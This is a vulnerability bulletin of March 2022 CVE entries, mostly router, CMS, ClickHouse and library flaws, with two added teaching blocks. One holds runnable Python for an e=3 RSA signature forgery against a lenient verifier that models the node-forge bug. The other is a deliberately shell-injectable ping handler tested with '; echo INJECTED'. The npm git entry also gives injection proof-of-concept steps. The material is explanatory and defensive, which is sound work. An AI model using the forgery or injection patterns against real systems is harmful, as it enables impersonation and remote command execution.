arm — cortex_and_neoverse_processors Certain Arm Cortex and Neoverse processors through 2022-03-08 do not properly restrict cache speculation, aka Spectre-BHB. An attacker can leverage the shared branch history in the Branch History Buffer (BHB) to influence mispredicted branches. Then, cache allocation can allow the attacker to obtain sensitive information. 2022-03-13 not yet calculated CVE-2022-23960
CONFIRM
MISC
MLIST
arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the firewall-local log function via the EmailAddress, SmtpServerName, SmtpUsername, and SmtpPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26990
MISC
arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the ntp function via the TimeZone parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26991
MISC
arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the pppoe function via the pppoeUserName, pppoePassword, and pppoe_Service parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26993
MISC
arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the ddns function via the DdnsUserName, DdnsHostName, and DdnsPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26992
MISC
arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the pptp function via the pptpUserName and pptpPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26994
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the wps setting function via the wps_enrolee_pin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26998
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pptp (wan_pptp.html) function via the pptp_fix_ip, pptp_fix_mask, pptp_fix_gw, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26995
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pppoe function via the pppoe_username, pppoe_passwd, and pppoe_servicename parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26996
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the time and time zone function via the h_primary_ntp_server, h_backup_ntp_server, and h_time_zone parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27000
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the upnp function via the upnp_ttl parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26997
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the static ip settings function via the wan_ip_stat, wan_mask_stat, wan_gw_stat, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26999
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the dhcp function via the hostname parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27001
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the ddns function via the ddns_name, ddns_pwd, h_ddns?ddns_host parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27002
MISC
atlassian — fisheye_and_crucible The jQuery deserialize library in Fisheye and Crucible before version 4.8.9 allowed remote attackers to inject arbitrary HTML and/or JavaScript via a prototype pollution vulnerability. 2022-03-16 not yet calculated CVE-2021-43956
MISC
MISC
atlassian — fisheye_and_crucible Affected versions of Atlassian Fisheye & Crucible allowed remote attackers to browse local files via an Insecure Direct Object References (IDOR) vulnerability in the WEB-INF directory and bypass the fix for CVE-2020-29446 due to a lack of url decoding. The affected versions are before version 4.8.9. 2022-03-16 not yet calculated CVE-2021-43957
MISC
MISC
atlassian — fisheye_and_crucible The /rest-service-fecru/server-v1 resource in Fisheye and Crucible before version 4.8.9 allowed authenticated remote attackers to obtain information about installation directories via an information disclosure vulnerability. 2022-03-16 not yet calculated CVE-2021-43955
MISC
MISC
atlassian — fisheye_and_crucible Various rest resources in Fisheye and Crucible before version 4.8.9 allowed remote attackers to brute force user login credentials, as rest resources did not check whether users were beyond their max failed login limits and therefore required solving a CAPTCHA in addition to providing user credentials for authentication, via an improper restriction of excess authentication attempts vulnerability. 2022-03-16 not yet calculated CVE-2021-43958
MISC
MISC
atom — cms Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the “A” parameter in /widgets/debug.php. 2022-03-15 not yet calculated CVE-2022-25489
MISC
atom — cms Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php. 2022-03-15 not yet calculated CVE-2022-25487
MISC
atom — cms Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php. 2022-03-15 not yet calculated CVE-2022-25488
MISC
automotive_grade_linux_kooky_koi — automotive_grade_linux_kooky_koi Automotive Grade Linux Kooky Koi 11.0.0, 11.0.1, 11.0.2, 11.0.3, 11.0.4, and 11.0.5 is affected by Incorrect Access Control in usr/bin/afb-daemon. To exploit the vulnerability, an attacker should send a well-crafted HTTP (or WebSocket) request to the socket listened by the afb-daemon process. No credentials nor user interactions are required. 2022-03-18 not yet calculated CVE-2022-24595
MISC
axeda — agent_and_desktop_server_for_windows Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) uses hard-coded credentials for its UltraVNC installation. Successful exploitation of this vulnerability could allow a remote authenticated attacker to take full remote control of the host operating system. 2022-03-16 not yet calculated CVE-2022-25246
MISC
MISC
axeda — agent_and_desktop_server_for_windows Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send certain commands to a specific port without authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to obtain full file-system access and remote code execution. 2022-03-16 not yet calculated CVE-2022-25247
MISC
MISC
axeda — agent_and_desktop_server_for_windows When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send a certain command to a specific port without authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to shut down a specific service. 2022-03-16 not yet calculated CVE-2022-25250
MISC
MISC
axeda — agent_and_desktop_server_for_windows When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) supplies the event log of the specific service. 2022-03-16 not yet calculated CVE-2022-25248
MISC
MISC
axeda — agent_and_desktop_server_for_windows When connecting to a certain port, Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) (disregarding Axeda agent v6.9.2 and v6.9.3) is vulnerable to directory traversal, which could allow a remote unauthenticated attacker to obtain file system read access via web server. 2022-03-16 not yet calculated CVE-2022-25249
MISC
MISC
axeda — agent_and_desktop_server_for_windows When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send certain XML messages to a specific port without proper authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to read and modify the affected product’s configuration. 2022-03-16 not yet calculated CVE-2022-25251
MISC
MISC
axeda — agent_and_desktop_server_for_windows When connecting to a certain port, Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) throw an exception when receiving certain input. Services using said function do not handle the exception. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to crash the affected product. 2022-03-16 not yet calculated CVE-2022-25252
MISC
MISC
bareos — bareos Bareos is open source software for backup, archiving, and recovery of data for operating systems. When Bareos Director >= 18.2 but prior to 21.1.0, 20.0.6, and 19.2.12 is built and configured for PAM authentication, a failed PAM authentication will leak a small amount of memory. An attacker that is able to use the PAM Console (i.e. by knowing the shared secret or via the WebUI) can flood the Director with failing login attempts which will eventually lead to an out-of-memory condition in which the Director will not work anymore. Bareos Director versions 21.1.0, 20.0.6 and 19.2.12 contain a Bugfix for this problem. Users who are unable to upgrade may disable PAM authentication as a workaround. 2022-03-15 not yet calculated CVE-2022-24756
MISC
CONFIRM
MISC
MISC
MISC
bareos — bareos Bareos is open source software for backup, archiving, and recovery of data for operating systems. When Bareos Director >= 18.2 but prior to 21.1.0, 20.0.6, and 19.2.12 is built and configured for PAM authentication, it will skip authorization checks completely. Expired accounts and accounts with expired passwords can still login. This problem will affect users that have PAM enabled. Currently there is no authorization (e.g. check for expired or disabled accounts), but only plain authentication (i.e. check if username and password match). Bareos Director versions 21.1.0, 20.0.6 and 19.2.12 implement the authorization check that was previously missing. The only workaround is to make sure that authentication fails if the user is not authorized. 2022-03-15 not yet calculated CVE-2022-24755
MISC
MISC
MISC
CONFIRM
MISC
bitbucket_pipeline_variable — bitbucket_pipeline_variable A flaw was found in ansible module where credentials are disclosed in the console log by default and not protected by the security feature when using the bitbucket_pipeline_variable module. This flaw allows an attacker to steal bitbucket_pipeline credentials. The highest threat from this vulnerability is to confidentiality. 2022-03-16 not yet calculated CVE-2021-20180
MISC
bodymen — bodymen The package bodymen from 0.0.0 is vulnerable to Prototype Pollution via the handler function which could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload. **Note:** This vulnerability derives from an incomplete fix to [CVE-2019-10792](https://security.snyk.io/vuln/SNYK-JS-BODYMEN-548897). 2022-03-17 not yet calculated CVE-2022-25296
MISC
braintree — sanitizeurl The package @braintree/sanitize-url before 6.0.0 is vulnerable to Cross-site Scripting (XSS) due to improper sanitization in the sanitizeUrl function. 2022-03-16 not yet calculated CVE-2021-23648
MISC
MISC
MISC
MISC
brocade — fabric_os A vulnerability in the Brocade Fabric OS before Brocade Fabric OS v9.0.1a, v8.2.3, v8.2.0_CBN4, and v7.4.2h could allow an authenticated CLI user to abuse the history command to write arbitrary content to files. 2022-03-18 not yet calculated CVE-2020-15388
MISC
brocade — fabric_os The Web application of Brocade Fabric OS before versions Brocade Fabric OS v9.0.1a and v8.2.3a contains debug statements that expose sensitive information to the program’s standard output device. An attacker who has compromised the FOS system may utilize this weakness to capture sensitive information, such as user credentials. 2022-03-18 not yet calculated CVE-2021-27789
MISC
chainsafe — libp2p-noise `@chainsafe/libp2p-noise` contains TypeScript implementation of noise protocol, an encryption protocol used in libp2p. `@chainsafe/libp2p-noise` before 4.1.2 and 5.0.3 does not correctly validate signatures during the handshake process. This may allow a man-in-the-middle to pose as other peers and get those peers banned. Users should upgrade to version 4.1.2 or 5.0.3 to receive a patch. There are currently no known workarounds. 2022-03-17 not yet calculated CVE-2022-24759
MISC
MISC
CONFIRM
ckeditor4 — ckeditor4 CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. CKEditor4 prior to version 4.18.0 contains a vulnerability in the `dialog` plugin. The vulnerability allows abuse of a dialog input validator regular expression, which can cause a significant performance drop resulting in a browser tab freeze. A patch is available in version 4.18.0. There are currently no known workarounds. 2022-03-16 not yet calculated CVE-2022-24729
MISC
CONFIRM
CONFIRM
ckeditor4 — ckeditor4 CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds. 2022-03-16 not yet calculated CVE-2022-24728
MISC
CONFIRM
MISC
CONFIRM
classcms — classcms Classcms v2.5 and below contains an arbitrary file upload via the component classclassupload. This vulnerability allows attackers to execute code injection via a crafted .txt file. 2022-03-18 not yet calculated CVE-2022-25581
MISC
clickhouse — dbms Heap buffer overflow in Clickhouse’s LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. This issue is very similar to CVE-2021-43304, but the vulnerable copy operation is in a different wildCopy call. 2022-03-14 not yet calculated CVE-2021-43305
MISC
clickhouse — dbms Divide-by-zero in Clickhouse’s Gorilla compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. 2022-03-14 not yet calculated CVE-2021-42391
MISC
clickhouse — dbms Divide-by-zero in Clickhouse’s Delta compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. 2022-03-14 not yet calculated CVE-2021-42389
MISC
clickhouse — dbms Heap out-of-bounds read in Clickhouse’s LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value (‘offset’) is read from the compressed data. The offset is later used in the length of a copy operation, without checking the lower bounds of the source of the copy operation. 2022-03-14 not yet calculated CVE-2021-42388
MISC
clickhouse — dbms Divide-by-zero in Clickhouse’s DeltaDouble compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. 2022-03-14 not yet calculated CVE-2021-42390
MISC
clickhouse — dbms Heap buffer overflow in Clickhouse’s LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. 2022-03-14 not yet calculated CVE-2021-43304
MISC
clickhouse — dbms Heap out-of-bounds read in Clickhouse’s LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value (‘offset’) is read from the compressed data. The offset is later used in the length of a copy operation, without checking the upper bounds of the source of the copy operation. 2022-03-14 not yet calculated CVE-2021-42387
MISC
cometd — cometd CometD is a scalable comet implementation for web messaging. In any version prior to 5.0.11, 6.0.6, and 7.0.6, internal usage of Oort and Seti channels is improperly authorized, so any remote user could subscribe and publish to those channels. By subscribing to those channels, a remote user may be able to watch cluster-internal traffic that contains other users’ (possibly sensitive) data. By publishing to those channels, a remote user may be able to create/modify/delete other user’s data and modify the cluster structure. A fix is available in versions 5.0.11, 6.0.6, and 7.0.6. As a workaround, install a custom `SecurityPolicy` that forbids subscription and publishing to remote, non-Oort, sessions on Oort and Seti channels. 2022-03-15 not yet calculated CVE-2022-24721
MISC
CONFIRM
commonsbooking — commonsbooking The CommonsBooking WordPress plugin before 2.6.8 does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection. 2022-03-14 not yet calculated CVE-2022-0658
MISC
contact_form_x — contact_form_x Reflected Cross-Site Scripting (XSS) vulnerability affecting parameter &tab discovered in Contact Form X WordPress plugin (versions <= 2.4). 2022-03-11 not yet calculated CVE-2022-25601
CONFIRM
CONFIRM
FEDORA
FEDORA
contao — managed_edition Contao Managed Edition v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the component php_cli parameter. 2022-03-18 not yet calculated CVE-2022-26265
MISC
countdown_coming_soon — countdown_coming_soon The Countdown, Coming Soon, Maintenance WordPress plugin before 2.2.9 does not sanitize and escape the post parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 2022-03-14 not yet calculated CVE-2022-0601
CONFIRM
MISC
cri-o — cri-o A flaw was found in CRI-O in the way it set kernel options for a pod. This issue allows anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime to achieve a container escape and arbitrary code execution as root on the cluster node, where the malicious pod was deployed. 2022-03-16 not yet calculated CVE-2022-0811
MISC
MISC
cuppacms — cuppacms CuppaCMS v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the saveConfigData function in /classes/ajax/Functions.php. 2022-03-15 not yet calculated CVE-2022-25498
MISC
cuppacms — cuppacms CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php. 2022-03-15 not yet calculated CVE-2022-25485
MISC
cuppacms — cuppacms The component /jquery_file_upload/server/php/index.php of CuppaCMS v1.0 allows attackers to upload arbitrary files and execute arbitrary code via a crafted PHP file. 2022-03-15 not yet calculated CVE-2022-25495
MISC
cuppacms — cuppacms CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php. 2022-03-15 not yet calculated CVE-2022-25486
MISC
cuppacms — cuppacms CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function. 2022-03-15 not yet calculated CVE-2022-25497
MISC
cvrf-csaf-converter — cvrf-csaf-converter CVRF-CSAF-Converter before 1.0.0-rc2 resolves XML External Entities (XXE). This leads to the inclusion of arbitrary (local) file content into the generated output document. An attacker can exploit this to disclose information from the system running the converter. 2022-03-15 not yet calculated CVE-2022-27193
MISC
dcn_firewall — dcme-520 DCN Firewall DCME-520 was discovered to contain an arbitrary file download vulnerability via the path parameter in the file /audit/log/log_management.php. 2022-03-18 not yet calculated CVE-2022-25389
MISC
dcn_firewall — dcme-520 DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php. 2022-03-18 not yet calculated CVE-2022-25390
MISC
delete_marker_category_delete_map_and_copy_map — delete_marker_category_delete_map_and_copy_map Cross-Site Request Forgery (CSRF) vulnerability affecting Delete Marker Category, Delete Map, and Copy Map functions in WP Google Map plugin (versions <= 4.2.3). 2022-03-11 not yet calculated CVE-2022-25600
CONFIRM
CONFIRM
FEDORA
FEDORA
eos — eos EOS v2.1.0 was discovered to contain a heap-buffer-overflow via the function txn_test_gen_plugin. 2022-03-17 not yet calculated CVE-2022-26300
MISC
event_manager_and_tickets_selling_for_woocommerce — event_manager_and_tickets_selling_for_woocommerce The Event Manager and Tickets Selling for WooCommerce WordPress plugin before 3.5.8 does not validate and escape the post_author_gutenberg parameter before using it in a SQL statement when creating/editing events, which could allow users with a role as low as contributor to perform SQL Injection attacks. 2022-03-14 not yet calculated CVE-2022-0478
CONFIRM
MISC
fasthttp — fasthttp The package github.com/valyala/fasthttp before 1.34.0 is vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only. 2022-03-17 not yet calculated CVE-2022-21221
MISC
MISC
MISC
MISC
MISC
fexsrv — fexsrv fexsrv in F*EX (aka Frams’ Fast File EXchange) before fex-20160919_2 allows eval injection (for unauthenticated remote code execution). 2022-03-17 not yet calculated CVE-2020-15591
MISC
CONFIRM
fisco-bcos — fisco-bcos FISCO-BCOS release-3.0.0-rc2 was discovered to contain an issue where a malicious node, via a malicious viewchange packet, will cause normal nodes to change view excessively and stop generating blocks. 2022-03-17 not yet calculated CVE-2022-26534
MISC
fish — fish fish is a command line shell. fish version 3.1.0 through version 3.3.1 is vulnerable to arbitrary code execution. git repositories can contain per-repository configuration that changes the behavior of git, including running arbitrary commands. When using the default configuration of fish, changing to a directory automatically runs `git` commands in order to display information about the current repository in the prompt. If an attacker can convince a user to change their current directory into one controlled by the attacker, such as on a shared file system or extracted archive, fish will run arbitrary commands under the attacker’s control. This problem has been fixed in fish 3.4.0. Note that running git in these directories, including using the git tab completion, remains a potential trigger for this issue. As a workaround, remove the `fish_git_prompt` function from the prompt. 2022-03-14 not yet calculated CVE-2022-20001
MISC
CONFIRM
MISC
flexi — flexi The Flexi WordPress plugin before 4.20 does not sanitise and escape various parameters before outputting them back in some pages such as the user dashboard, leading to a Reflected Cross-Site Scripting. 2022-03-14 not yet calculated CVE-2022-0449
MISC
forge — forge Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for trailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. 2022-03-18 not yet calculated CVE-2022-24772
MISC
MISC
CONFIRM
forge — forge Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. 2022-03-18 not yet calculated CVE-2022-24771
CONFIRM
MISC
forge — forge Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not properly check `DigestInfo` for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. 2022-03-18 not yet calculated CVE-2022-24773
MISC
CONFIRM
MISC
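Worked example for the three node-forge entries above (CVE-2022-24771, CVE-2022-24772, CVE-2022-24773). This is added here and is not node-forge's code: it places a strict RSASSA-PKCS1-v1_5 check beside a lenient one that models the pre-1.3.0 flaw (the bytes after `DigestInfo` are never compared), then builds the classic e=3 forgery that the lenient check accepts. The toy key generation, the SHA-256 `DigestInfo` prefix and the sample message are assumptions made so that the example runs offline.

```python
"""Added example (not node-forge code): a strict RSASSA-PKCS1-v1_5 check beside
a lenient one that models the pre-1.3.0 node-forge behaviour (trailing bytes
after DigestInfo are ignored), and the e=3 forgery that the lenient check
accepts. Key generation is a toy, included only so the example runs offline."""
import hashlib
import random

E = 3  # low public exponent; the forgery below relies on it
# DER prefix of DigestInfo for SHA-256 (RFC 8017, section 9.2, note 1)
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")


def _is_probable_prime(n, rounds=16):
    """Miller-Rabin, adequate for a demonstration key."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits):
    while True:
        c = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if c % E != 1 and _is_probable_prime(c):  # c % 3 == 2 keeps gcd(E, c-1) == 1
            return c


def generate_key(bits=2048):
    """Return (n, d) for public exponent E. Toy key generation, not for real use."""
    p, q = _random_prime(bits // 2), _random_prime(bits // 2)
    return p * q, pow(E, -1, (p - 1) * (q - 1))


def _encode(msg, k):
    """EMSA-PKCS1-v1_5: 00 01 || FF..FF || 00 || DigestInfo, exactly k bytes."""
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(msg, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(_encode(msg, k), "big"), d, n).to_bytes(k, "big")


def verify_strict(msg, sig, n):
    """RFC 8017 verify: compare the whole recovered block byte for byte; no parsing."""
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    return em == _encode(msg, k)


def verify_lenient(msg, sig, n):
    """Models the flaw: walk past the padding, check that the right DigestInfo
    follows, and never look at what comes after it."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i >= k or em[i] != 0x00:
        return False
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t  # BUG: em[i + 1 + len(t):] is ignored


def _icbrt_ceil(x):
    """Smallest integer s with s**3 >= x (binary search)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge(msg, n):
    """Bleichenbacher's e=3 forgery, no private key needed. Target block:
    00 01 FF 00 || DigestInfo || zeros. Its ceiling cube root s has s**3 < n
    (no modular reduction) and s**3 matches the target in every byte that
    verify_lenient reads; the difference lands in the ignored tail."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01\xff\x00" + SHA256_DIGESTINFO_PREFIX + hashlib.sha256(msg).digest()
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    return _icbrt_ceil(target).to_bytes(k, "big")


if __name__ == "__main__":
    n, d = generate_key()
    msg = b"constructed sample message"
    real, fake = sign(msg, n, d), forge(msg, n)
    print("real signature  strict/lenient:", verify_strict(msg, real, n), verify_lenient(msg, real, n))
    print("forged signature strict/lenient:", verify_strict(msg, fake, n), verify_lenient(msg, fake, n))
```

The forgery needs a modulus large enough that the unchecked tail (here roughly 1600 bits of a 2048-bit block) can absorb the rounding error of the cube root, which is why e=3 keys are the ones exposed. The fix is not a better parser but no parser at all: re-encode the expected block and compare it in full, as `verify_strict` does.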
fuxa — fuxa A Server-Side Request Forgery (SSRF) vulnerability in FUXA 1.1.3 can be used to obtain sensitive information from the server’s internal environment and services, and can potentially lead to the attacker executing commands on the server. 2022-03-16 not yet calculated CVE-2021-45851
MISC
fv_flowplayer_video_player — fv_flowplayer_video_player Authenticated (author or higher user role) SQL Injection (SQLi) vulnerability discovered in FV Flowplayer Video Player WordPress plugin (versions <= 7.5.15.727). 2022-03-18 not yet calculated CVE-2022-25607
CONFIRM
CONFIRM
gd_mylist — gd_mylist The GD Mylist WordPress plugin through 1.1.1 does not sanitise and escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. 2022-03-14 not yet calculated CVE-2022-0703
MISC
ge — reason_clocks A code injection vulnerability exists in one of the webpages in GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06 that could allow an authenticated remote attacker to execute arbitrary code on the system. 2022-03-18 not yet calculated CVE-2020-25197
CONFIRM
CONFIRM
ge — reason_clocks By having access to the hard-coded cryptographic key for GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06, attackers would be able to intercept and decrypt encrypted traffic through an HTTPS connection. 2022-03-18 not yet calculated CVE-2020-25193
CONFIRM
CONFIRM
getgrav — grav Cross-site Scripting (XSS) – Stored in GitHub repository getgrav/grav prior to 1.7.31. 2022-03-15 not yet calculated CVE-2022-0970
MISC
CONFIRM
git — git All versions of the npm package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to reproduce: 1. Create a file named exploit.js with the following content: var Git = require("git").Git; var repo = new Git("repo-test"); var user_input = "version; date"; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install git. 3. Run node exploit.js. You should see the output of both the git version and the date command. Note that the repo-test Git repository does not need to be present for this PoC to work. 2022-03-17 not yet calculated CVE-2021-23632
MISC
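The npm `git` entry above and the DCN DCME-520 ping.php entry (CVE-2022-25390) are the same bug: user input spliced into a command line that a shell parses. The following is an added example, not code from either product: a "ping this host" handler in its vulnerable form (kept runnable so the injection can be observed) and in a hardened form that allow-lists the target and hands an argv list to the tool. The tool name and flags (`ping -c 1 -W 1`, iputils style) and the sample input are assumptions.

```python
"""Added example (not DCN or npm 'git' code): a 'ping this host' handler built
by string concatenation into a shell, beside the hardened form. The vulnerable
function is kept runnable so the injection can be observed; the tool name and
flags are assumed (iputils-style ping)."""
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$", re.IGNORECASE)


def vulnerable_ping(host):
    """The CVE-2022-25390 / CVE-2021-23632 pattern: user input is spliced into a
    command line that a shell parses, so ';', '|', '$(...)' and friends end the
    intended command and start another."""
    cmd = "ping -c 1 -W 1 " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def is_valid_target(host):
    """Allow-list, not deny-list: an IP literal or an RFC 1123 hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(_HOSTNAME.match(host))


def hardened_ping_argv(host):
    """Validate, then build an argv list. No shell sees the string, and '--'
    ends option parsing so the value can never be read as a flag."""
    if not is_valid_target(host):
        raise ValueError("rejected ping target: %r" % host)
    return ["ping", "-c", "1", "-W", "1", "--", host]


def hardened_ping(host):
    return subprocess.run(hardened_ping_argv(host), capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Constructed input: the host parameter as an attacker would send it.
    print(vulnerable_ping("; echo INJECTED"))  # the shell runs echo after ping fails
    print(hardened_ping_argv("example.com"))
    try:
        hardened_ping("; echo INJECTED")
    except ValueError as exc:
        print(exc)
```

Two points a reviewer should look for: the argv list alone is not enough, because a value such as `-c 100000` or `-f` is still parsed as an option by the tool unless the argument is validated or placed after `--`; and the validation is an allow-list of what a target can look like, not a list of shell metacharacters to strip.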
gitea — gitea The avatar middleware in Gitea before 1.13.6 allows Directory Traversal via a crafted URL. 2022-03-15 not yet calculated CVE-2021-29134
MISC
MISC
